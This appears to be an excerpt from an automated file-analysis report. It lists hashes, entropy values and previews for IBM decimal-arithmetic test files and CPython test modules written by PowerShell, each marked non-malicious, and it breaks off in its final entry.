                                                                                                                                                                                                                      SHA1:12859A8BE22E4B27C480853B835093D3C9951038
                                                                                                                                                                                                                      SHA-256:C1E4B25EE809A4147CEF51637234D4D360BD5E989F46F2CC8BE591E04A0FADB4
                                                                                                                                                                                                                      SHA-512:37759D10924E094769CB037A962A8E53FE7183C43589B53E47C7D49EDAC0F2E2EB64D7D28E55BA9BFF248AA99A86E1A386D33ED0B1DCD85C727383C6F1491630
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- dqCompareSig.decTest -- decQuad comparison; all NaNs signal --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):30846
                                                                                                                                                                                                                      Entropy (8bit):4.421059366892816
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:OkoVOCxAAiVVHRp4w9DhvCIw7fz1gkXehCNEKBypP+Y3m:AZUHIuafzHREeypPJm
                                                                                                                                                                                                                      MD5:3848453CBCD21A5974B4230EC8C9863C
                                                                                                                                                                                                                      SHA1:B0F8C14CD3964318421B7B3C13EA55A42CABDB50
                                                                                                                                                                                                                      SHA-256:3E90A363E5F39E958B73481DD03695193B8C8BC6894B7AFE4591D33B4A695646
                                                                                                                                                                                                                      SHA-512:BCB23380B24BDE40FEE9E40F65BC0C05BDC7EEC84B1D4EF2BB5CBC2600CB28A5EA3366963A82F322AB66BB7AD5AD561F59FB032E9AE03DBD1B3869DB9264D3A7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- dqCompareTotal.decTest -- decQuad comparison using total ordering --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):32626
                                                                                                                                                                                                                      Entropy (8bit):4.348912876682535
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:SEvjp8qORwDi1UH2sYnuV8LCpwBiR54Fj:JORwDi1UH2sYnuV8LCpwBiR54Fj
                                                                                                                                                                                                                      MD5:A79512766DC5A38ECB329861C342A2C5
                                                                                                                                                                                                                      SHA1:C7C08992C135331C1AFF60B377D5A0A4DBB5B11D
                                                                                                                                                                                                                      SHA-256:E51A488CEB485870C49565AAED29EAA58C803824C2B11B6F7B1EE1EA5D13D71A
                                                                                                                                                                                                                      SHA-512:A285A4E17541E7914DA80C7791573B4E21EEDB44FE686A279B2D48B968A1CFC90A3895A9DBD42B3A30C36F96B2762630B321F4830C7D12D62B4E0ED42BF07BBA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- dqCompareTotalMag.decTest -- decQuad comparison; abs. total order --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3987
                                                                                                                                                                                                                      Entropy (8bit):4.468413578285165
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:LA2oBkGiQHdaP88U57oqsjGP9VvFFFFFFFFrFFFFFFFFfFFFFFFFFmFFFFFFFFBI:UdkoY88O7oW9VvFFFFFFFFrFFFFFFFFH
                                                                                                                                                                                                                      MD5:4023EA7B09E5656499B5B403485AAA8E
                                                                                                                                                                                                                      SHA1:9237647E5A7B904586790159AE62E7F68C818123
                                                                                                                                                                                                                      SHA-256:4EBD19A61544600D39573978EF33AF969CE6C7A740019AD29FB4D299511B1024
                                                                                                                                                                                                                      SHA-512:3EEE6E9973E47C9C3C71A7CCE08469831120EAD31CA4A431B7839034CD40E1B8169E23F99320DB968518FB89B43EBBC9FD4837AD2BF12915EA86EBFB29DA36D1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- dqCopy.decTest -- quiet decQuad copy --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4101
                                                                                                                                                                                                                      Entropy (8bit):4.532437445917038
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:LaoBkGiQHda30p+Lbpln7/2H3FFFFFFFFrFFFFFFFFbFFFFFFFFrFFFFFFFFvrzO:FkoA0p+Lll7/2H3FFFFFFFFrFFFFFFFs
                                                                                                                                                                                                                      MD5:C18B2283B3009CA6A8FF45DD90BFF057
                                                                                                                                                                                                                      SHA1:7A10F97A66E397B61BD92B492B3D9170E5EEE55B
                                                                                                                                                                                                                      SHA-256:4DAA59567C172E56FFF0D90147D407A460CD21F6B2C704AB683CBBF569B98445
                                                                                                                                                                                                                      SHA-512:F18CE5B08278C394473758BD832BFF8C35AECA6E396F291D5274C253BFCF5F34FFF3C70223EA53A090E2D3C5D13CD68DFAB6B7BADD244275B6BCE338AFE83E7B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- dqCopyAbs.decTest -- quiet decQuad copy and set sign to zero --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4248
                                                                                                                                                                                                                      Entropy (8bit):4.546629858777918
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:LUoBkGiQHdaKNp4NwvPospIFFFFFFFFmFFFFFFFFMFFFFFFFFrFFFFFFFFWHr:DkopNpbVpIFFFFFFFFmFFFFFFFFMFFFQ
                                                                                                                                                                                                                      MD5:DA793DED1CFFC51AF9806719C8B6830F
                                                                                                                                                                                                                      SHA1:7C307E00287D8E210398D1AFD140F6394D8EAD01
                                                                                                                                                                                                                      SHA-256:F5EBAABB2B1362CB112F7ABC40BBB0894DC84EA49AD6AAB9B6F8D6B9CD338958
                                                                                                                                                                                                                      SHA-512:B62C292EFFB386501A7A7BF1C51D9D8EB126C45ADE61B682BA8EE83AA8EEE214A30B9DD1CC6254541BCBBDF1E5CD223695EB9971F9D87AE2CD282EC8772A7D85
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- dqCopyNegate.decTest -- quiet decQuad copy and negate --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8228
                                                                                                                                                                                                                      Entropy (8bit):4.435850534679904
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:PkoW1HjYFFFFFFFFDFFFFFFFFcFFFFFFFFDFFFFFFFF8AQGP6uFFFFFFFFoFFFFh:4HjYFFFFFFFFDFFFFFFFFcFFFFFFFFDs
                                                                                                                                                                                                                      MD5:1870384C4C4A8CCC6C1E48B804F8FE2F
                                                                                                                                                                                                                      SHA1:CEBC4489A210C4FDCEAF8D065AC5D351DAD1F327
                                                                                                                                                                                                                      SHA-256:3EEE62FF3DB418635FBB1B0157116E1F44C32DDEB1B2BF6D156EBA35A24EC955
                                                                                                                                                                                                                      SHA-512:9C6EFD1B823D2BF3D981601884C6164803829621694192D197377036EBC6A18198A93E4DE0DF802E411CBEA9E945491FE400B60C6C1B4AA28117AB2212D9D03B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- dqCopySign.decTest -- quiet decQuad copy with sign from rhs --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):55102
                                                                                                                                                                                                                      Entropy (8bit):4.626691688816073
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:VH0Kkt+G20blocHxnJGsflPcTIGj0vUVou8OZTm9mtoKAC/ATI2s8O5u9YD:B0hmcHxnJT0bo6o9mtoKTAhO
                                                                                                                                                                                                                      MD5:020956C836009CBD1951FA80F582633E
                                                                                                                                                                                                                      SHA1:535938F2FA4D369BD663C3EF9911142AEE8B6A86
                                                                                                                                                                                                                      SHA-256:E689E4EB4404C3E58229B4FB7B93EEF39E2C5DEAF757ED813023C20DD3EB09D4
                                                                                                                                                                                                                      SHA-512:9B9D83BC83AB5E42DA346B7D416109C8BB47784D97F587736B091B9A399A2972ECF78DAC3C487A650DF10330FA67F782D03FCB86CF93278E996589D34C176A04
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- dqDivide.decTest -- decQuad division --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19826
                                                                                                                                                                                                                      Entropy (8bit):4.39708452687048
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:5Dkojhk/cgEAjY2/wduZ727uA/yJEjGznxanod2zjYp3rr5voR55B5xxZRxDO/ZZ:vw79vgDOan6/
                                                                                                                                                                                                                      MD5:BF6771F1B9510C0E976588C5B5D3AD41
                                                                                                                                                                                                                      SHA1:B650E553C28722B0CD6F8AB6674460FF0EF022C7
                                                                                                                                                                                                                      SHA-256:C775711A1F4D8A8821323D401375DA9642BF6514C0970709BC77D3FE9622CB06
                                                                                                                                                                                                                      SHA-512:E2F9B5D0E07C394832078F7647F0560D3F692F668389EADC527BF41FDCB7EF12AF7A891384FDA26BC5C7ADF5E978482AA3850C7BBB7CD5C011AD3E41AC5266E5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- dqDivideInt.decTest -- decQuad integer division --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12789
                                                                                                                                                                                                                      Entropy (8bit):4.50102146419529
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:wko7YrLCDuo0eeaN4jzYZ6sz7Mz6aShOGeqz:6YrUuHee9jzHk7MWaS8Geqz
                                                                                                                                                                                                                      MD5:838255B3FD53CB38378B5476C35338A1
                                                                                                                                                                                                                      SHA1:E96D41FE5E42F28380BC4D1E960A45FAE0F25271
                                                                                                                                                                                                                      SHA-256:1F6F322520E1CA1ED6F4CDC3C2BD472D59AB741E0E3EDB3883F12B8A93E2BF2B
                                                                                                                                                                                                                      SHA-512:AF65B1E7FD841DEDE7BDAACE72B590D6775CB4AA5E2E4FB6406F69B464637CF8631B8C8FBD12AD917B49D7597E61908C36E4FBCCAC6DD9C294E4CBFAEB6D0976
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- dqMaxMag.decTest -- decQuad maxnummag --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12004
                                                                                                                                                                                                                      Entropy (8bit):4.3429688272240625
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:LhoBkGiQHdafmWL+0gPugtVv0ZML+OzqF1I+aVXNh3XEpE1fU3vrSwESQCzVSt3m:ckoMi1Wwqsl2SyfIM9iZQ
                                                                                                                                                                                                                      MD5:713418339CCD82F932AECB0CBD4356A5
                                                                                                                                                                                                                      SHA1:01B5D0FFE4B7A63F786B5CD3A0290DEEEED0AC27
                                                                                                                                                                                                                      SHA-256:BFB997C6D1AF30F2B996EB7B8B6ED811AFF39C252B83393475BD8E5D33CE9533
                                                                                                                                                                                                                      SHA-512:8B77E8642920472A78D02AEFE50773B2A95FF3AEF2933706812293D597696CB7F03C775915246B220557C9053B9736E565CD9994320A7D158C5AA1036A75657A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- dqMin.decTest -- decQuad minnum --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):11649
                                                                                                                                                                                                                      Entropy (8bit):4.373404445786154
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:L5oBkGiQHda0QfXE3V7tiTfOgHXbQr0ynM5DGkBdGEJMjtnawo+9eZeZeyyun8aM:UkoiLVJijb5w0Zc1asL
                                                                                                                                                                                                                      MD5:F9B824857B1726C484E75A3A1E2E17FF
                                                                                                                                                                                                                      SHA1:59E1EFC186821FAB94850A3DA4A4C982A6806446
                                                                                                                                                                                                                      SHA-256:2C79FE801A5F972461BB6055D4A3241579D1C2C9A7F5FC82F4E7AA9FD0E3865B
                                                                                                                                                                                                                      SHA-512:6E44DBCB25E730879AE778519F68608CBB694C29184635F14A9A99D16683D334F4C3A46991C0B065D347DC5E4EC60967A0439635E6B887E7D7B07053875B5F8E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- dqMinMag.decTest -- decQuad minnummag --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4156
                                                                                                                                                                                                                      Entropy (8bit):4.500756025844742
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:LqoBkGiQHda6X3XQIta7lO8jFFFFFFFFmFFFFFFFFyFFFFFFFFrFFFFFFFFS3Dr:dkorX3XQItoO8jFFFFFFFFmFFFFFFFF1
                                                                                                                                                                                                                      MD5:DC8DE92FF5A8EF993E9841D2CBE15E16
                                                                                                                                                                                                                      SHA1:B40C6A6322C4C1369D538ABDD4E2F1BA7FE460A6
                                                                                                                                                                                                                      SHA-256:504566E27EABC396033090EA3EB8F4C46F4CBE09B3315AEB9937CC89EC36B0D4
                                                                                                                                                                                                                      SHA-512:853E244051934F115B75131C3A1A373EA64F147D125F4D98AD75BAA6E1408AA9B0E2D95281D2CFC94233C470140A1ECF7C50F4338B544EB15F937A94100353B3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- dqMinus.decTest -- decQuad 0-x --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5304
                                                                                                                                                                                                                      Entropy (8bit):4.264978953234674
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:FWr/4JR1kZr3KOBFYx/aLdQu2Hl/NvptORKEhFA:e/z3BBKxedQRHl/NvnRcA
                                                                                                                                                                                                                      MD5:B35A5FADD329D3C33DF2F0424EDE0603
                                                                                                                                                                                                                      SHA1:08B4D57351D664D70C3CCB37BF526F8478E45B0A
                                                                                                                                                                                                                      SHA-256:FF77ADEAB8C488B8F7970A2DBBBC2C3EBFD3758B6C75E0E7C699866A66B020CA
                                                                                                                                                                                                                      SHA-512:8F3FB59FCC7D59B80F50A4839E268736A462FF226274D6572E2829C691D409019D35AB24B7C9CDC35DD7108E6C004EF117A42F0D945C45434BEE1600CBE747F8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import unittest..from test import support..from test.support import warnings_helper..import os..import sys..import types....try:.. import _multiprocessing..except ModuleNotFoundError:.. _multiprocessing = None......if support.check_sanitizer(address=True, memory=True):.. # bpo-46633: test___all__ is skipped because importing some modules.. # directly can trigger known problems with ASAN (like tk or crypt)... raise unittest.SkipTest("workaround ASAN build issues on loading tests ".. "like tk or crypt")......class NoAll(RuntimeError):.. pass....class FailedImport(RuntimeError):.. pass......class AllTest(unittest.TestCase):.... def setUp(self):.. # concurrent.futures uses a __getattr__ hook. Its __all__ triggers.. # import of a submodule, which fails when _multiprocessing is not.. # available... if _multiprocessing is None:.. sys.modules["_multiprocessing"] = types.ModuleType("_multiprocessing")....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8496
                                                                                                                                                                                                                      Entropy (8bit):4.5565498033867815
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:lyJ0ZrJxbhhGyDeKjvkXMo/sB6h/9a/Y/1y:la01nb+aeEkIr
                                                                                                                                                                                                                      MD5:965857B8C0A65587D0AB59EDB964E986
                                                                                                                                                                                                                      SHA1:2FCEC9E3465D40BBCC2DC64257B3C9F282D6FA5E
                                                                                                                                                                                                                      SHA-256:4B0B767A3A5DC2D85A7DD34A31681B37B5390DFD5E7EBA0C2ADB9ECC5CE2A57E
                                                                                                                                                                                                                      SHA-512:30AEA5FE5C9F3A0D90368F21C09113D8F1B1C0DD19D5C19A1E41EF9B4A8D821B649A3700F027AE97689F14B67D81315A57B3F9474782AE744DE792ADB99645A3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from _locale import (setlocale, LC_ALL, LC_CTYPE, LC_NUMERIC, localeconv, Error)..try:.. from _locale import (RADIXCHAR, THOUSEP, nl_langinfo)..except ImportError:.. nl_langinfo = None....import locale..import sys..import unittest..from platform import uname....from test import support....if uname().system == "Darwin":.. maj, min, mic = [int(part) for part in uname().release.split(".")].. if (maj, min, mic) < (8, 0, 0):.. raise unittest.SkipTest("locale support broken for OS X < 10.4")....candidate_locales = ['es_UY', 'fr_FR', 'fi_FI', 'es_CO', 'pt_PT', 'it_IT',.. 'et_EE', 'es_PY', 'no_NO', 'nl_NL', 'lv_LV', 'el_GR', 'be_BY', 'fr_BE',.. 'ro_RO', 'ru_UA', 'ru_RU', 'es_VE', 'ca_ES', 'se_NO', 'es_EC', 'id_ID',.. 'ka_GE', 'es_CL', 'wa_BE', 'hu_HU', 'lt_LT', 'sl_SI', 'hr_HR', 'es_AR',.. 'es_ES', 'oc_FR', 'gl_ES', 'bg_BG', 'is_IS', 'mk_MK', 'de_AT', 'pt_BR',.. 'da_DK', 'nn_NO', 'cs_CZ', 'de_LU', 'es_BO', 'sq_AL', 'sk_SK', 'fr_CH',.. 'de_DE', 'sr_YU', 'br_
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4338
                                                                                                                                                                                                                      Entropy (8bit):4.603985940175592
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:7rGlcasm1gZ3JiNhgA0dTZOAJiLwCWqNjysBDpXA:36ct4YOjLRfN1XA
                                                                                                                                                                                                                      MD5:41DB70A11C40C9F998E3B9376B464190
                                                                                                                                                                                                                      SHA1:38B6473029C0EC14F8AE038CEE874BC509BF610C
                                                                                                                                                                                                                      SHA-256:AA8CF1DC3D6839E75BE04FB220625520E8F8DE36AA013F240E6DA65DE3F00A94
                                                                                                                                                                                                                      SHA-512:C3B764E718915D307F4822590EAF90FEB9ABBD7EF30B2686D66BA840DD5F022569FC4D058ABA7F0A81698C8931195F0FAD6C1919E806DA8E3EE7B410B2E8317D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import dis..from test.support.import_helper import import_module..import unittest..import opcode...._opcode = import_module("_opcode")..from _opcode import stack_effect......class OpcodeTests(unittest.TestCase):.... def test_stack_effect(self):.. self.assertEqual(stack_effect(dis.opmap['POP_TOP']), -1).. self.assertEqual(stack_effect(dis.opmap['BUILD_SLICE'], 0), -1).. self.assertEqual(stack_effect(dis.opmap['BUILD_SLICE'], 1), -1).. self.assertEqual(stack_effect(dis.opmap['BUILD_SLICE'], 3), -2).. self.assertRaises(ValueError, stack_effect, 30000).. self.assertRaises(ValueError, stack_effect, dis.opmap['BUILD_SLICE']).. self.assertRaises(ValueError, stack_effect, dis.opmap['POP_TOP'], 0).. # All defined opcodes.. has_arg = dis.hasarg.. for name, code in filter(lambda item: item[0] not in dis.deoptmap, dis.opmap.items()):.. if code >= opcode.MIN_INSTRUMENTED_OPCODE:.. continue..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):14273
                                                                                                                                                                                                                      Entropy (8bit):4.782994181331062
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:eucws1gKLDgA1ljwAIzGARigyARieAbQzI9qsWfpKkjWXZlyKHHdjVoA:eFwqoiMi/9qzaHXp
                                                                                                                                                                                                                      MD5:E0D5733C004F4BF25C12FD71278DE020
                                                                                                                                                                                                                      SHA1:06DA5E401A41571A74E4620AC63F18518701B75A
                                                                                                                                                                                                                      SHA-256:34EE6763B540FE2DE17703E98B35D4B26B909D4581C47C91714E1CAD3A32B661
                                                                                                                                                                                                                      SHA-512:02AF71953A87BF6422859AC27B8E58E81AC48893F28E3E1E1AC0FFB924A106B33C432F08333020D6FC6431B55949C357B3E0812EBD8681A3178079D73EFAD15F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""..Test suite for _osx_support: shared OS X support functions..."""....import os..import platform..import stat..import sys..import unittest....from test.support import os_helper....import _osx_support....@unittest.skipUnless(sys.platform.startswith("darwin"), "requires OS X")..class Test_OSXSupport(unittest.TestCase):.... def setUp(self):.. self.maxDiff = None.. self.prog_name = 'bogus_program_xxxx'.. self.temp_path_dir = os.path.abspath(os.getcwd()).. self.env = self.enterContext(os_helper.EnvironmentVarGuard()).. for cv in ('CFLAGS', 'LDFLAGS', 'CPPFLAGS',.. 'BASECFLAGS', 'BLDSHARED', 'LDSHARED', 'CC',.. 'CXX', 'PY_CFLAGS', 'PY_LDFLAGS', 'PY_CPPFLAGS',.. 'PY_CORE_CFLAGS', 'PY_CORE_LDFLAGS'):.. if cv in self.env:.. self.env.unset(cv).... def add_expected_saved_initial_values(self, config_vars, expected_vars):.. # Ensure that the i
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):54996
                                                                                                                                                                                                                      Entropy (8bit):4.33937698205422
                                                                                                                                                                                                                      Encrypted:false
